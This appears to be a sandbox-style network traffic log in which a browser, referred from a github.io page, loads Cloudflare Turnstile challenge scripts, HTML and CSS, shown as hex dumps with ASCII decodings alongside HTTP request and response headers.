2024-09-25 16:44:36 UTC	1369	IN	Data Raw: 66 75 6e 63 74 69 6f 6e 20 41 65 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 48 74 28 65 29 7c 7c 42 74 28 65 2c 72 29 7c 7c 71 74 28 65 2c 72 29 7c 7c 6a 74 28 29 7d 66 75 6e 63 74 69 6f 6e 20 50 28 65 29 7b 22 40 73 77 63 2f 68 65 6c 70 65 72 73 20 2d 20 74 79 70 65 6f 66 22 3b 72 65 74 75 72 6e 20 65 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 66 75 6e 63 74 69 6f 6e 20 44 65 28 65 2c 72 29 7b 76 61 72 20 61 3d 7b 6c 61 62 65 6c 3a 30 2c 73 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 6c 5b 30 5d 26 31 29 74 68 72 6f 77 20 6c 5b 31 5d 3b 72 65 74 75 72 6e 20 6c 5b 31 5d 7d 2c 74 72 Data Ascii: function Ae(e,r){return Ht(e)\|\|Bt(e,r)\|\|qt(e,r)\|\|jt()}function P(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function De(e,r){var a={label:0,sent:function(){if(l[0]&1)throw l[1];return l[1]},tr
2024-09-25 16:44:36 UTC	1369	IN	Data Raw: 6f 61 64 65 64 2c 20 62 75 74 20 74 68 65 20 69 66 72 61 6d 65 20 75 6e 64 65 72 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 6c 6f 61 64 65 64 2e 20 48 61 73 20 74 68 65 20 76 69 73 69 74 6f 72 20 62 6c 6f 63 6b 65 64 20 73 6f 6d 65 20 70 61 72 74 73 20 6f 66 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 6f 72 20 61 72 65 20 74 68 65 79 20 73 65 6c 66 2d 68 6f 73 74 69 6e 67 20 61 70 69 2e 6a 73 3f 22 7d 3b 76 61 72 20 47 74 3d 33 30 30 30 32 30 3b 76 61 72 20 50 65 3d 33 30 30 30 33 30 3b 76 61 72 20 55 65 3d 33 30 30 30 33 31 3b 76 61 72 20 71 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 4d 41 4e 41 47 45 44 3d 22 6d 61 6e 61 67 65 64 22 2c Data Ascii: oaded, but the iframe under challenges.cloudflare.com could not be loaded. Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Gt=300020;var Pe=300030;var Ue=300031;var q;(function(e){e.MANAGED="managed",
2024-09-25 16:44:36 UTC	1369	IN	Data Raw: 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 69 65 7c 7c 28 69 65 3d 7b 7d 29 29 3b 76 61 72 20 58 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 4c 57 41 59 53 3d 22 61 6c 77 61 79 73 22 2c 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 2c 65 2e 49 4e 54 45 52 41 43 54 49 4f 4e 5f 4f 4e 4c 59 3d 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 7d 29 28 58 7c 7c 28 58 3d 7b 7d 29 29 3b 76 61 72 20 70 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 52 45 4e 44 45 52 3d 22 72 65 6e 64 65 72 22 2c 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 7d 29 28 70 65 7c 7c 28 70 65 3d 7b 7d 29 29 3b 76 61 72 20 6f 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 7d 29 Data Ascii: al",e.AUTO="auto"})(ie\|\|(ie={}));var X;(function(e){e.ALWAYS="always",e.EXECUTE="execute",e.INTERACTION_ONLY="interaction-only"})(X\|\|(X={}));var pe;(function(e){e.RENDER="render",e.EXECUTE="execute"})(pe\|\|(pe={}));var oe;(function(e){e.EXECUTE="execute"})
2024-09-25 16:44:36 UTC	1369	IN	Data Raw: 61 72 63 68 50 61 72 61 6d 73 3b 69 66 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 26 26 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 6f 66 66 6c 61 62 65 6c 21 3d 3d 22 64 65 66 61 75 6c 74 22 26 26 72 2e 73 65 74 28 22 6f 66 66 6c 61 62 65 6c 22 2c 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 6f 66 66 6c 61 62 65 6c 29 2c 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 63 6c 65 61 72 61 6e 63 65 5f 6c 65 76 65 6c 21 3d 3d 22 64 65 66 61 75 6c 74 22 26 26 72 2e 73 65 74 28 22 63 6c 65 61 72 61 6e 63 65 5f 6c 65 76 65 6c 22 2c 65 2e 70 61 72 61 6d 73 2e Data Ascii: archParams;if(e.params._debugSitekeyOverrides&&(e.params._debugSitekeyOverrides.offlabel!=="default"&&r.set("offlabel",e.params._debugSitekeyOverrides.offlabel),e.params._debugSitekeyOverrides.clearance_level!=="default"&&r.set("clearance_level",e.params.
2024-09-25 16:44:36 UTC	1369	IN	Data Raw: 3d 3d 3d 53 65 2e 46 41 49 4c 55 52 45 5f 48 41 56 49 4e 47 5f 54 52 4f 55 42 4c 45 53 2c 6c 2c 67 3d 4c 28 43 72 2c 28 6c 3d 28 72 3d 65 2e 64 69 73 70 6c 61 79 4c 61 6e 67 75 61 67 65 29 3d 3d 3d 6e 75 6c 6c 7c 7c 72 3d 3d 3d 76 6f 69 64 20 30 3f 76 6f 69 64 20 30 3a 72 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 21 3d 3d 6e 75 6c 6c 26 26 6c 21 3d 3d 76 6f 69 64 20 30 3f 6c 3a 22 6e 6f 6e 65 78 69 73 74 65 6e 74 22 29 2c 66 2c 70 3d 4c 28 4e 72 2c 28 66 3d 28 61 3d 65 2e 64 69 73 70 6c 61 79 4c 61 6e 67 75 61 67 65 29 3d 3d 3d 6e 75 6c 6c 7c 7c 61 3d 3d 3d 76 6f 69 64 20 30 3f 76 6f 69 64 20 30 3a 61 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 21 3d 3d 6e 75 6c 6c 26 26 66 21 3d 3d 76 6f 69 64 20 30 3f 66 3a 22 6e 6f 6e 65 78 69 73 74 65 6e 74 22 29 Data Ascii: ===Se.FAILURE_HAVING_TROUBLES,l,g=L(Cr,(l=(r=e.displayLanguage)===null\|\|r===void 0?void 0:r.toLowerCase())!==null&&l!==void 0?l:"nonexistent"),f,p=L(Nr,(f=(a=e.displayLanguage)===null\|\|a===void 0?void 0:a.toLowerCase())!==null&&f!==void 0?f:"nonexistent")
2024-09-25 16:44:36 UTC	1369	IN	Data Raw: 75 63 74 3a 49 65 3d 66 75 6e 63 74 69 6f 6e 28 63 2c 6c 2c 67 29 7b 76 61 72 20 66 3d 5b 6e 75 6c 6c 5d 3b 66 2e 70 75 73 68 2e 61 70 70 6c 79 28 66 2c 6c 29 3b 76 61 72 20 70 3d 46 75 6e 63 74 69 6f 6e 2e 62 69 6e 64 2e 61 70 70 6c 79 28 63 2c 66 29 2c 73 3d 6e 65 77 20 70 3b 72 65 74 75 72 6e 20 67 26 26 4a 28 73 2c 67 2e 70 72 6f 74 6f 74 79 70 65 29 2c 73 7d 2c 49 65 2e 61 70 70 6c 79 28 6e 75 6c 6c 2c 61 72 67 75 6d 65 6e 74 73 29 7d 66 75 6e 63 74 69 6f 6e 20 63 65 28 65 29 7b 72 65 74 75 72 6e 20 63 65 3d 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3f 4f 62 6a 65 63 74 2e 67 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 2e 5f 5f 70 72 6f 74 6f 5f 5f 7c 7c 4f 62 6a 65 63 74 Data Ascii: uct:Ie=function(c,l,g){var f=[null];f.push.apply(f,l);var p=Function.bind.apply(c,f),s=new p;return g&&J(s,g.prototype),s},Ie.apply(null,arguments)}function ce(e){return ce=Object.setPrototypeOf?Object.getPrototypeOf:function(a){return a.__proto__\|\|Object
2024-09-25 16:44:36 UTC	1369	IN	Data Raw: 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 29 29 7d 66 75 6e 63 74 69 6f 6e 20 71 65 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 73 74 61 72 74 73 57 69 74 68 28 57 65 29 3f 65 2e 73 75 62 73 74 72 69 6e 67 28 57 65 2e 6c 65 6e 67 74 68 29 3a 6e 75 6c 6c 7d 66 75 6e 63 74 69 6f 6e 20 4b 28 65 29 7b 72 65 74 75 72 6e 22 22 2e 63 6f 6e 63 61 74 28 57 65 29 2e 63 6f 6e 63 61 74 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 54 74 28 29 7b 76 61 72 20 65 3d 2f 5c 2f 74 75 72 6e 73 74 69 6c 65 5c 2f 76 30 28 5c 2f 2e 2a 29 3f 5c 2f 61 70 69 5c 2e 6a 73 2f 2c 72 3d 64 6f 63 75 6d 65 6e 74 2e 63 75 72 72 65 6e 74 53 63 72 69 70 74 3b 69 66 28 55 28 72 2c 48 54 4d 4c 53 63 72 69 70 74 45 6c 65 6d 65 6e 74 29 26 26 65 2e 74 65 73 74 28 72 Data Ascii: flare Turnstile] ".concat(e))}function qe(e){return e.startsWith(We)?e.substring(We.length):null}function K(e){return"".concat(We).concat(e)}function Tt(){var e=/\/turnstile\/v0(\/.*)?\/api\.js/,r=document.currentScript;if(U(r,HTMLScriptElement)&&e.test(r
2024-09-25 16:44:36 UTC	1369	IN	Data Raw: 66 2e 73 74 79 6c 65 2e 62 61 63 6b 67 72 6f 75 6e 64 3d 22 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 34 29 22 3b 76 61 72 20 70 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 70 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 3d 22 74 61 62 6c 65 2d 63 65 6c 6c 22 2c 70 2e 73 74 79 6c 65 2e 76 65 72 74 69 63 61 6c 41 6c 69 67 6e 3d 22 6d 69 64 64 6c 65 22 2c 70 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 22 31 30 30 76 77 22 2c 70 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 31 30 30 76 68 22 3b 76 61 72 20 73 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 73 2e 63 6c 61 73 73 4e 61 6d 65 3d 22 63 66 2d 74 75 72 6e 73 74 69 6c 65 2d 66 65 65 64 62 61 63 6b 22 2c 73 2e 69 64 3d Data Ascii: f.style.background="rgba(0,0,0,0.4)";var p=document.createElement("div");p.style.display="table-cell",p.style.verticalAlign="middle",p.style.width="100vw",p.style.height="100vh";var s=document.createElement("div");s.className="cf-turnstile-feedback",s.id=

Timestamp	Bytes transferred	Direction	Data
2024-09-25 16:44:36 UTC	800	OUT	GET /cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/5renj/0x4AAAAAAAktEy218PeM5fmO/auto/fbE/normal/auto/ HTTP/1.1 Host: challenges.cloudflare.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: navigate Sec-Fetch-Dest: iframe Referer: https://maveuve.github.io/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-09-25 16:44:36 UTC	1369	IN	HTTP/1.1 200 OK Date: Wed, 25 Sep 2024 16:44:36 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 164872 Connection: close cross-origin-resource-policy: cross-origin origin-agent-cluster: ?1 accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA cross-origin-embedder-policy: require-corp permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=() content-security-policy: frame-src https://challenges.cloudflare.com/ blob:; base-uri 'self' referrer-policy: same-origin critical-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 document-policy: js-profiling cross-origin-opener-policy: same-origin
2024-09-25 16:44:36 UTC	52	IN	Data Raw: 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 38 63 37 61 64 38 63 39 36 39 34 31 61 36 2d 45 57 52 0d 0a 0d 0a Data Ascii: Server: cloudflareCF-RAY: 8c8c7ad8c96941a6-EWR
2024-09-25 16:44:36 UTC	1317	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0a Data Ascii: <!DOCTYPE HTML><html lang="en-US"><head> <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1"> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
2024-09-25 16:44:36 UTC	1369	IN	Data Raw: 25 3b 6d 61 72 67 69 6e 3a 30 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 70 61 64 64 69 6e 67 3a 30 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 6d 61 69 6e 2d 77 72 61 70 70 65 72 2c 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 73 79 73 74 65 6d 2d 75 69 2c 62 6c 69 6e 6b 6d 61 63 73 79 73 74 65 6d 66 6f 6e 74 2c 53 65 67 6f 65 20 55 49 2c 72 6f 62 6f 74 6f 2c 6f 78 79 67 65 6e 2c 75 62 75 6e 74 75 2c 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 2d 77 65 62 Data Ascii: %;margin:0;overflow:hidden;padding:0;width:100%}.main-wrapper,body{background-color:#fff;color:#232323;font-family:-apple-system,system-ui,blinkmacsystemfont,Segoe UI,roboto,oxygen,ubuntu,Helvetica Neue,arial,sans-serif;font-size:14px;font-weight:400;-web
2024-09-25 16:44:36 UTC	1369	IN	Data Raw: 67 68 74 3a 33 30 70 78 3b 77 69 64 74 68 3a 33 30 70 78 7d 23 73 75 63 63 65 73 73 2d 70 72 65 2d 69 20 6c 69 6e 65 7b 73 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 61 6e 69 6d 61 74 69 6f 6e 3a 66 69 72 65 77 6f 72 6b 20 2e 33 73 20 65 61 73 65 2d 6f 75 74 20 31 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 3b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 33 32 20 33 32 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 2d 38 7d 23 73 75 63 63 65 73 73 2d 74 65 78 74 7b 61 6e 69 6d 61 74 69 6f 6e 3a 66 61 64 65 2d 69 6e 20 31 73 20 66 6f 72 77 61 72 64 73 3b 6f 70 61 63 69 74 79 3a 30 7d 2e 73 75 63 63 65 73 73 2d 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74 Data Ascii: ght:30px;width:30px}#success-pre-i line{stroke:#038127;animation:firework .3s ease-out 1;stroke-width:1;stroke-dasharray:32 32;stroke-dashoffset:-8}#success-text{animation:fade-in 1s forwards;opacity:0}.success-circle{stroke-dashoffset:0;stroke-width:2;st
2024-09-25 16:44:36 UTC	1369	IN	Data Raw: 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 68 6f 76 65 72 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e Data Ascii: allenge-overlay a,.theme-dark #challenge-overlay a:link,.theme-dark #challenge-overlay a:visited{color:#bbb}.theme-dark #challenge-error-text a:active,.theme-dark #challenge-error-text a:focus,.theme-dark #challenge-error-text a:hover,.theme-dark #challen
2024-09-25 16:44:36 UTC	1369	IN	Data Raw: 64 61 72 6b 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 66 69 6c 6c 3a 23 66 66 66 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 Data Ascii: dark .logo-text{fill:#fff}.theme-dark #fr-helper-loop-link,.theme-dark #fr-helper-loop-link:link,.theme-dark #fr-helper-loop-link:visited{color:#bbb}.theme-dark #fr-helper-loop-link:active,.theme-dark #fr-helper-loop-link:focus,.theme-dark #fr-helper-loop
2024-09-25 16:44:36 UTC	1369	IN	Data Raw: 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 6c 69 6e 6b 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 61 63 74 69 76 65 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 66 6f 63 75 73 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 23 31 36 36 33 37 39 7d 23 6c 6f 67 6f 7b 68 65 69 67 68 74 3a 32 35 70 78 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 70 78 7d 2e 66 61 69 6c 75 72 65 2d 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 31 36 36 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 Data Ascii: ,#challenge-overlay a:link,#challenge-overlay a:visited{color:#232323}#challenge-overlay a:active,#challenge-overlay a:focus,#challenge-overlay a:hover{color:#166379}#logo{height:25px;margin-bottom:1px}.failure-circle{stroke-dasharray:166;stroke-dashoffse
2024-09-25 16:44:36 UTC	1369	IN	Data Raw: 6e 3a 61 6c 6c 20 2e 31 73 20 65 61 73 65 2d 69 6e 3b 77 69 64 74 68 3a 32 34 70 78 3b 7a 2d 69 6e 64 65 78 3a 39 39 39 38 7d 2e 63 62 2d 6c 62 20 2e 63 62 2d 69 3a 61 66 74 65 72 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 35 70 78 3b 63 6f 6e 74 65 6e 74 3a 22 22 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 7d 2e 63 62 2d 6c 62 20 2e 63 62 2d 6c 62 2d 74 7b 67 72 69 64 2d 63 6f 6c 75 6d 6e 3a 32 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 38 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 63 6f 6e 74 65 6e 74 7b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 66 6c 65 78 2d 73 74 61 72 74 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 66 6c 6f 77 3a 63 6f 6c Data Ascii: n:all .1s ease-in;width:24px;z-index:9998}.cb-lb .cb-i:after{border-radius:5px;content:"";position:absolute}.cb-lb .cb-lb-t{grid-column:2;margin-left:8px}.size-compact{font-size:14px}.size-compact #content{align-items:flex-start;display:flex;flex-flow:col
2024-09-25 16:44:36 UTC	1369	IN	Data Raw: 72 74 6c 7d 2e 72 74 6c 20 2e 63 62 2d 6c 62 2d 74 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 30 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 30 7d 2e 72 74 6c 20 23 65 78 70 69 72 65 64 2d 69 2c 2e 72 74 6c 20 23 66 61 69 6c 2d 69 2c 2e 72 74 6c 20 23 6f 76 65 72 72 75 6e 2d 69 2c 2e 72 74 6c 20 23 73 70 69 6e 6e 65 72 2d 69 2c 2e 72 74 6c 20 23 73 75 63 63 65 73 73 2d 69 2c 2e 72 74 6c 20 23 74 69 6d 65 6f 75 74 2d 69 7b 6c 65 66 74 3a 32 35 35 70 78 7d 2e 72 74 6c 20 23 66 72 2d 68 65 6c 70 65 72 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2e 32 35 65 6d 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 31 36 70 78 3b 77 69 64 74 68 3a 39 30 70 78 Data Ascii: rtl}.rtl .cb-lb-t{margin-left:0;margin-right:8px;padding:0}.rtl #expired-i,.rtl #fail-i,.rtl #overrun-i,.rtl #spinner-i,.rtl #success-i,.rtl #timeout-i{left:255px}.rtl #fr-helper{margin-left:.25em;margin-right:0}.rtl #branding{margin:0 0 0 16px;width:90px
2024-09-25 16:44:36 UTC	1369	IN	Data Raw: 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 7b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 61 63 74 69 76 65 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 66 6f 63 75 73 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 23 31 36 36 33 37 39 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 6c 69 6e 6b 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 7d 23 63 68 61 6c 6c Data Ascii: challenge-error-title a{color:#232323}#challenge-error-title a:active,#challenge-error-title a:focus,#challenge-error-title a:hover{color:#166379;text-decoration:underline}#challenge-error-title a:link,#challenge-error-title a:visited{color:#232323}#chall

Timestamp	Bytes transferred	Direction	Data
2024-09-25 16:44:37 UTC	730	OUT	GET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8c8c7ad8c96941a6&lang=auto HTTP/1.1 Host: challenges.cloudflare.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/5renj/0x4AAAAAAAktEy218PeM5fmO/auto/fbE/normal/auto/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
